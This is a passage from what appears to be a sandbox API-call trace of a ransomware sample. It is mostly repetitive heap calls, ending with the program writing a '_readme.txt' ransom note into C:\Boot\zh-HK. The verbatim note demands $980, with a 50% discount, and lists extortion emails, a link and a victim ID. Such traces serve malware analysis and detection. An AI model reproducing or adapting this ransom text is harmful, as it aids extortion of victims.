Size=0x20) returned 0x2e83a70 [0188.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.716] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0188.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.717] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.718] PathFindFileNameW (pszPath="") returned="" [0188.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.718] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.719] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.719] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.720] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.721] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0188.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.722] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0188.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.722] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.722] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.722] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.724] RtlAllocateHeap 